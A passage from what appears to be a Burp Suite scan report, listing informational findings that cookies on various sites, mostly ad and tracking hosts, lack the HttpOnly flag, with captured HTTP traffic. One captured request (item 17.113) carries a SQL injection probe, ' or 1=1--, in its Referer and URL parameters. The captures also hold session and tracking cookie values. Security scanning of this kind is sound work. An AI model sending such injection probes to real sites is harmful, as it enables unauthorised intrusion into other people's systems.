Confidence:	Certain
Host:	http://blogs.silverlight.net
Path:	/showcasehosted/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:31 GMT; expires=Sun, 29-Jan-2012 23:40:31 GMT; path=/
CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; expires=Sun, 30-Jan-2011 00:00:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showcasehosted/default.aspx HTTP/1.1
Host: blogs.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 8701
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:31 GMT; expires=Sun, 29-Jan-2012 23:40:31 GMT; path=/
Set-Cookie: CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; expires=Sun, 30-Jan-2011 00:00:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:40:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA-C
...[SNIP]...

17.110. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetAdvertisements previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.silverlight.net
Path:	/showcasehosted/resources/services/BasicService.svc/GetAdvertisements

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:59 GMT; expires=Sun, 29-Jan-2012 23:22:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /showcasehosted/resources/services/BasicService.svc/GetAdvertisements HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Origin: http://blogs.silverlight.net
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 412
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:59 GMT; expires=Sun, 29-Jan-2012 23:22:59 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:59 GMT

{"d":[{"__type":"Advertisement:#SAW_WebService","advertisement_id":1,"source_type":null,"format":null,"url":"http:\/\/ads.asp.net\/ads\/Telerik-FreeSL-300x250.jpg","click_url":"http:\/\/www.telerik.co
...[SNIP]...

17.111. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetCountries previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.silverlight.net
Path:	/showcasehosted/resources/services/BasicService.svc/GetCountries

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:00 GMT; expires=Sun, 29-Jan-2012 23:23:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /showcasehosted/resources/services/BasicService.svc/GetCountries HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Origin: http://blogs.silverlight.net
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:59 GMT
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9070
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:00 GMT; expires=Sun, 29-Jan-2012 23:23:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:01 GMT

{"d":[{"__type":"Location:#SAW_WebService","location_id":710,"region":"default","country_code":"ZA","country":"South Africa","parent_location_id":null},{"__type":"Location:#SAW_WebService","location_i
...[SNIP]...

17.112. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetDemos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.silverlight.net
Path:	/showcasehosted/resources/services/BasicService.svc/GetDemos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; expires=Sun, 29-Jan-2012 23:23:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /showcasehosted/resources/services/BasicService.svc/GetDemos HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Origin: http://blogs.silverlight.net
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:00 GMT
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 772476
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; expires=Sun, 29-Jan-2012 23:23:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:05 GMT

{"d":[{"__type":"Demo:#SAW_WebService","demo_id":251,"location_id":840,"name":"Windows Vista Simulator","description":"The Windows Vista experience, simulated on the Web. Created as a demonstration o
...[SNIP]...

17.113. http://bonniercorp.122.2o7.net/b/ss/timepopsci/1/H.14/s78723546345718 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bonniercorp.122.2o7.net
Path:	/b/ss/timepopsci/1/H.14/s78723546345718

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26A2CE6E851D0395-6000012A402043A3[CE]; Expires=Fri, 29 Jan 2016 17:16:13 GMT; Domain=bonniercorp.122.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/timepopsci/1/H.14/s78723546345718?[AQB]&ndh=1&t=30/0/2011%2011%3A16%3A16%200%20360&ns=bonniercorp&pageName=popsci%7Cfront-page&g=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&r=http%3A//burp/show/61&cc=USD&events=event2&v1=popsci%7Cfront-page&c17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&v17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&c21=Data%20Not%20Available&v21=Data%20Not%20Available&c22=Data%20Not%20Available&v22=Data%20Not%20Available&c23=Data%20Not%20Available&v23=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: bonniercorp.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 17:16:13 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A2CE6E851D0395-6000012A402043A3[CE]; Expires=Fri, 29 Jan 2016 17:16:13 GMT; Domain=bonniercorp.122.2o7.net; Path=/
Location: http://bonniercorp.122.2o7.net/b/ss/timepopsci/1/H.14/s78723546345718?AQB=1&pccr=true&vidn=26A2CE6E851D0395-6000012A402043A3&&ndh=1&t=30/0/2011%2011%3A16%3A16%200%20360&ns=bonniercorp&pageName=popsci%7Cfront-page&g=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&r=http%3A//burp/show/61&cc=USD&events=event2&v1=popsci%7Cfront-page&c17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&v17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&c21=Data%20Not%20Available&v21=Data%20Not%20Available&c22=Data%20Not%20Available&v22=Data%20Not%20Available&c23=Data%20Not%20Available&v23=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 17:16:13 GMT
Last-Modified: Mon, 31 Jan 2011 17:16:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www282
Content-Length: 0
Content-Type: text/plain

17.114. http://boyle.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boyle.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=9ff34bdc0b2e32fcc178bd49c46b26f9; expires=Sat, 25-Jan-2031 02:05:03 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: boyle.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.115. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Connection: close
Content-Length: 2204

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

17.116. http://c.redcated/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.redcated
Path:	/c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redcated
Proxy-Connection: Keep-Alive

Response

17.117. http://c.bing.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.bing.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; domain=.bing.com; expires=Thu, 18-Aug-2011 17:11:11 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.118. http://c.redacted/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.redacted
Path:	/c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; domain=.redacted; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

17.119. http://c.statcounter.com/t.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0; expires=Fri, 29-Jan-2016 14:47:53 GMT; path=/; domain=.statcounter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.120. http://calendar.live.com/calendar/calendar.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://calendar.live.com
Path:	/calendar/calendar.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

mktstate=S=-1659053062&U=&E=&P=&B=en; domain=.live.com; path=/
mkt1=norm=en; domain=.live.com; path=/
mkt2=ui=en-us; domain=.calendar.live.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /calendar/calendar.aspx HTTP/1.1
Host: calendar.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.121. http://careers.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://careers.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=da39980442014ca6b9da39619943b989; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8EDD00D637154D4B841C122EB598FF5B; domain=.redacted; expires=Thu, 18-Aug-2011 02:06:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: careers.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.122. http://citi.bridgetrack.com/event/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/event/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CitiBTSES=SID=3632A0E47C3A454A9ED45144B2EBD941; path=/
ATV9=57504dTQ9L1c62c4K4cIM2Cccc2VTNc15L6cc1753c8c8cc1753cccccdTU091cc4DEcOR16c2c28Rc2VJ6c14TAccQ0Eccccccccc; expires=Wed, 02-Feb-2011 05:00:00 GMT; path=/
CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Wed, 25-Jan-2012 05:00:00 GMT; path=/
ASB9=TX=1296392433&W=0&Tr=26638&Cp=4526&P=814118&B=9&T=37802&Cr=97894&S=0&Cn=0&Pd=0&SID=6A9811BEC51D4B829380A28CF78C1BE2&Vn=2331&Ct=0&Pc=0&Pb=2&A=0; expires=Wed, 02-Feb-2011 05:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/?type=-1&BTData=C02177F736E617E5C504A43B1BEBEA9AD95978492FFF7F6EFEAC5C2DEF029DB7&BT_PUB=2&BT_VEN=2331&BT_TRF=26638&r=[RANDOM] HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://redcated/NYC/iview/264935949/direct;;wi.300;hi.250/01?click=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=; AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; ASB9=TX=1296270961&Pb=0&A=8&SID=3E5F37C0F6194C72A60362B4B4E88931&Vn=0&Ct=0&Pc=0&S=&Cn=194&Pd=8&T=38566&Cr=98231&W=40099&Tr=40099&Cp=4740&P=612428&B=9; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; ATV9=49137dTQ9L1c62c4K4cIM2Cccc2VTNc15L6cc1753c8c8cc1753ccccc

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 43
Content-Type: image/GIF
Expires: Sat, 29 Jan 2011 13:00:32 GMT
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=3632A0E47C3A454A9ED45144B2EBD941; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: ATV9=57504dTQ9L1c62c4K4cIM2Cccc2VTNc15L6cc1753c8c8cc1753cccccdTU091cc4DEcOR16c2c28Rc2VJ6c14TAccQ0Eccccccccc; expires=Wed, 02-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Wed, 25-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: ASB9=TX=1296392433&W=0&Tr=26638&Cp=4526&P=814118&B=9&T=37802&Cr=97894&S=0&Cn=0&Pd=0&SID=6A9811BEC51D4B829380A28CF78C1BE2&Vn=2331&Ct=0&Pc=0&Pb=2&A=0; expires=Wed, 02-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT%5F9=; expires=Wed, 25-Jan-2012 05:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 13:00:32 GMT
Connection: close

GIF89a.............!.......,...........L..;

17.123. http://clk.redcated/APM/go/139941180/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/APM/go/139941180/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296353263-3972457; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=7E5205F6A748400B84AD01F34006AE37; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/285d4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=b882065/285d4/10e4d581/bab9/4d44c7ef; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /APM/go/139941180/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.124. http://clk.redcated/APM/go/148848786/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/APM/go/148848786/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296353265-3982025; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=5DEF820424F84B24B69D3D93ECECB25F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bce8f84/1a43a/11174245/bab9/4d44c7f1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /APM/go/148848786/direct HTTP/1.1
